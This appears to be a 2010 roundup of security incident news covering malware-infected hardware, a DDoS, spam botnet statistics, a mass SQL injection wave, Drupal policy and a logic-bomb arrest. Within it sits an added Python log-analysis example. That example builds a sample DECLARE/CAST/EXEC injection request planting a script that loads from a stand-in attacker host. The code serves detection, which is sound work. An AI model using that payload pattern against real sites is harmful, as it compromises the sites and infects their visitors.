
2010 Incident Handling


Dell Ships Malware-Infected Server Motherboard.

IBM hands out infected USB drives at security conference - The H.

Web hoster Media Temple shut down by attack | InSecurity Complex.

Media Temple, Web hosting provider for Adobe, ABC, Sony, NBC, Time, Volkswagen, and Starbucks, was hit with a sophisticated distributed denial-of-service (DDoS) attack Tuesday. The outage began about 3:50 p.m. PDT, when Media Temple's domain name servers were deluged by a flood of traffic coming from outside the U.S., and lasted a total of about two-and-a-half hours, according to a tech support representative at the Los Angeles-based company.

"Due to the sophistication of the attack, our normal DDoS firewall prevention techniques didn't block the attack adequately, as the traffic appears to be legitimate," the company reported at around 5:40 p.m. PDT. The company said it had initially blocked all traffic from Asia, South America, and Mexico to reduce strain on the network, but later removed the blocks. Company representatives did not immediately return a call seeking comment. Breakdown of all the major online threats in May. Posted on 26 May 2010. Latest MessageLabs Intelligence Report reveals that nine out of ten spam emails now contain a URL link in the message.

In May, five percent of all domains found in spam URLs belonged to genuine web sites. Of the most frequently used domain names contained in spam URLs, the top four belong to well-known web sites used for social networking, blogging, file sharing and host other forms of user-generated content. While Rustock is the botnet that uses the greatest number of disposable domains, Storm, which has recently returned to the spamming scene, is the only botnet that uses genuine domains in greater number than disposable domains.

Sixty-five percent of spam from the Storm botnet uses a legitimate domain, many of which are for URL shortening services. Disposable domains are often used quickly after being first registered; on average, 50 percent are used within nine days, before spammers switch to newer domains. Other stats from the report include:

Spyware Found on 3 Major Mac Download Sites.

Microsoft Releases Anti-XSS Web Protection Library.

SMS Blockers: The New Face of Ransomware.

Samsung smartphone shipped with malware-infected memory card.

The latest mass-market product that has been found being shipped to customers while containing malware is the Samsung S8500 Wave phone with the Samsung bada mobile platform. The malicious file in question is slmvsrv.exe, and can be found on the 1GB microSD memory card contained in the smartphone. The malicious file is accompanied by an Autorun.inf file, which installs itself on any Windows PC that still has the autorun feature enabled. According to Michael Oryl, he received a device for testing and after he found out that the card was infected, he did an online search for the file in question and unearthed two posts on some German forums that claim the same. He contacted Samsung, and they confirmed that the initial production run of the devices shipped to Germany was, indeed, infected.

"A PC that is infected with the malware will try to copy the program and associated autorun.inf file onto any memory card or USB memory drive that is inserted into the infected computer. Olympus Stylus Tough camera shipped with malware. Samsung is not the only company that has been lately caught shipping malware-infected consumer electronics - Olympus Japan has admitted that a little over 1700 units of the Stylus Tough 6010 digital compact camera that was available for sale in Japan contain a virus on the memory card shipped with it. According to Sophos, the camera itself is not at risk - it is your PC that you have to worry about, since the card also contains an autorun worm that would allow the virus to take residence on the computer when you plug the device into it. For the people who might have bought one of the "infected" cameras, Olympus has provided a widget on their official site where customers can insert the serial number of the camera in order to check if their device is affected: Unfortunately, for those who don't know Japanese the site is pretty much useless - unless they have someone who can translate the results for them.

Mass SQL injection attack compromises IIS/ASP sites. Posted on 10 June 2010.

Thousands of websites and who knows how many visitors were affected by the recently discovered mass SQL injection attack that targeted, among others, The Wall Street Journal and The Jerusalem Post websites. Sucuri Security spotted the attack on many websites and Googled the web address to which the injected script was pointing; according to the results, some 114,000 different pages contained it. Further investigation revealed the common denominator: all the affected sites are hosted on IIS servers and use ASP.NET. By sifting through the logs and the packet dump of the attack, they also discovered that the attack was launched against a third-party ad management script.
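The log sifting Sucuri describes, as an added example that is not the page's or Sucuri's code: it parses IIS W3C extended log lines, flags query strings carrying SQL injection markers and decodes the hex-encoded DECLARE/CAST/EXEC payload that mass SQL injection waves of that era commonly used to smuggle the `<script src=...>` string past filters, then shows the companion check on served HTML for off-site script sources, which is what the Google search for the injected address keyed on. Whether this particular wave used the hex form is an assumption; the log lines, the `/ads/banner.aspx` path, the hosts and the addresses are constructed.

```python
"""Spot a mass SQL injection wave in IIS logs and show what it planted.

Added example for the mass SQL injection story above; not code from the
page or from Sucuri. Parses IIS W3C log lines, URL-decodes the query string,
flags the hex-encoded DECLARE/CAST/EXEC form such waves commonly used (that
this wave did is an assumption) and decodes the blob to show the hidden SQL.
All log lines, hosts, paths and addresses below are constructed.
"""
import re
from urllib.parse import unquote_plus

SQLI_MARKERS = re.compile(
    r"\b(declare|cast|exec|varchar|nvarchar|char)\b|0x[0-9a-f]{16,}|;--",
    re.IGNORECASE,
)
HEX_BLOB = re.compile(r"0x([0-9a-f]{16,})", re.IGNORECASE)
SCRIPT_SRC = re.compile(r"<script[^>]+src=[\"']?(?:https?:)?//([^/\"'\s>]+)",
                        re.IGNORECASE)


def parse_w3c(lines):
    """Yield one dict per request, keyed by the names in the #Fields: line."""
    fields = None
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split(" ")
        if len(values) == len(fields):   # skip malformed lines, never misalign
            yield dict(zip(fields, values))


def decode_hex_payload(query):
    """Return the text hidden in a CAST(0x... AS VARCHAR) blob, or None.

    The payload was hex-encoded so 'UPDATE ... <script src=' never appeared
    literally in the request; SQL Server reads 0x-hex as a binary literal.
    Odd-length or non-hex input is treated as not a payload.
    """
    m = HEX_BLOB.search(query)
    if not m:
        return None
    try:
        return bytes.fromhex(m.group(1)).decode("latin-1")
    except ValueError:
        return None


def flag_injections(lines):
    """Return [(client_ip, uri_stem, decoded_query, hidden_sql)] for suspect hits."""
    hits = []
    for req in parse_w3c(lines):
        query = unquote_plus(req.get("cs-uri-query", "-"))
        if query != "-" and SQLI_MARKERS.search(query):
            hits.append((req.get("c-ip"), req.get("cs-uri-stem"),
                         query, decode_hex_payload(query)))
    return hits


def find_offsite_scripts(html, own_host):
    """Return distinct third-party hosts that <script src=...> tags load from."""
    hosts = []
    for host in SCRIPT_SRC.findall(html):
        if host.lower() != own_host.lower() and host not in hosts:
            hosts.append(host)
    return hosts


# Constructed: the SQL an attacker wants run, and its hex form as it would
# appear in the request (built here so the sample log is self-consistent).
HIDDEN_SQL = ("UPDATE ads SET body=body+"
              "'<script src=\"http://evil.example/a.js\"></script>'")
HIDDEN_HEX = "0x" + HIDDEN_SQL.encode("latin-1").hex().upper()

# Constructed IIS W3C log: a normal hit on an ad script, an injection attempt
# against it, and an unrelated request. Addresses are documentation ranges.
SAMPLE_LOG = f"""#Software: Microsoft Internet Information Services 7.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2010-06-08 03:12:44 198.51.100.7 GET /ads/banner.aspx id=42 200
2010-06-08 03:12:45 203.0.113.9 GET /ads/banner.aspx id=42;DECLARE+@S+VARCHAR(4000);SET+@S=CAST({HIDDEN_HEX}+AS+VARCHAR(4000));EXEC(@S);-- 200
2010-06-08 03:12:46 198.51.100.8 GET /news/story.aspx id=77&page=2 200
""".splitlines()

# Constructed page as a compromised site would serve it afterwards.
INJECTED_PAGE = ('<html><body><h1>Story</h1><script src="/js/site.js"></script>'
                 '<script src="http://evil.example/a.js"></script></body></html>')

if __name__ == "__main__":
    for ip, stem, query, hidden in flag_injections(SAMPLE_LOG):
        print(f"{ip} -> {stem}\n  query : {query}\n  hidden: {hidden}")
    print("off-site scripts:", find_offsite_scripts(INJECTED_PAGE, "www.example.com"))
```

Decoding the blob matters more than flagging the request: the hidden UPDATE names the table and column the attacker wrote into, which is exactly what you need to clean the database, and the host it loads the script from is the address to search for and block while the ad script itself is being fixed.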

When a user visits a compromised site, the malicious code will attempt to redirect him to a site where malware is waiting to be installed on his machine, giving the criminals behind this attack remote access to it.

Drupal clarifies security rules after White-House gaper • The Re.

Webmasters running unfinished modules for Drupal do so at their own risk after the open-source CMS updated its guidelines on fixing security vulnerabilities.

The project has updated the wording on its security site on how it handles security fixes to clarify it will only work on vulnerabilities in completed code of modules that comprise the CMS. The change clarifies that modules in release-candidate mode will not be supported. Drupal will work with maintainers of modules that are code complete, with maintainers now given a deadline to fix the problem.

If the deadline's missed, the module and the project will be unpublished from Drupal.org. Vulnerabilities in unfinished code will simply be flagged in the module's issue queue. The clarifications are a response to the discovery of a potentially serious XSS hole in the Drupal Context module three weeks after White House developers proudly released their own plug-in based on the buggy module.

SSH Brute Force Attacks Resurface.

Malicious code on Lenovo driver download page - Update - The H S.

Spanish firm raided in logic-bomb backdoor probe.

Three managers at an unnamed Spanish software developer have been arrested over allegations that they planted 'logic bombs' in software, so that clients were obliged to pay for disruptive repairs and extended maintenance contracts. The Guardia Civil said that more than 1,000 clients of the Andalucia-based developer have been affected by the scam since 1998.

The unnamed firm marketed custom software to small and medium-sized businesses with built-in errors such that it was guaranteed to fail at a predetermined date. These errors would "paralyse the normal functioning of businesses" and oblige customers to contact their supplier, who would charge them for repairs and extended support. In the course of making repairs, the developer allegedly programmed systems to fail again at a future date. An anonymous web-based tip-off led to a Guardia Civil investigation and a subsequent raid on the firm's premises, where computer equipment and records were seized for analysis.

Report: Chinese Military Behind Google, Other Cyberattacks - Dar.

Most attacks traced to Chinese island tourist attraction that also houses state-of-the-art military installation.

A new report handed to Congress today concludes that the Chinese military -- the People's Liberation Army -- is behind most cyberattacks on the U.S., including the infamous Operation Aurora attacks that hit Google, Adobe, Intel, and other companies.

The "China, Cyber Espionage and U.S. National Security" white paper, authored by independent research group Medius Research and commissioned by political action organization Patriot Majority, says most cyberattacks out of China originate from Hainan Island, a tourist attraction with a massive high-tech military installation located on the South China Sea. "Hainan Island is a pretty good showcase of military modernization. It combines several capabilities, including a space launch and a submarine [base]," says Richard Parker, lead researcher for the Medius report. The report says the U.S. Have a comment on this story?
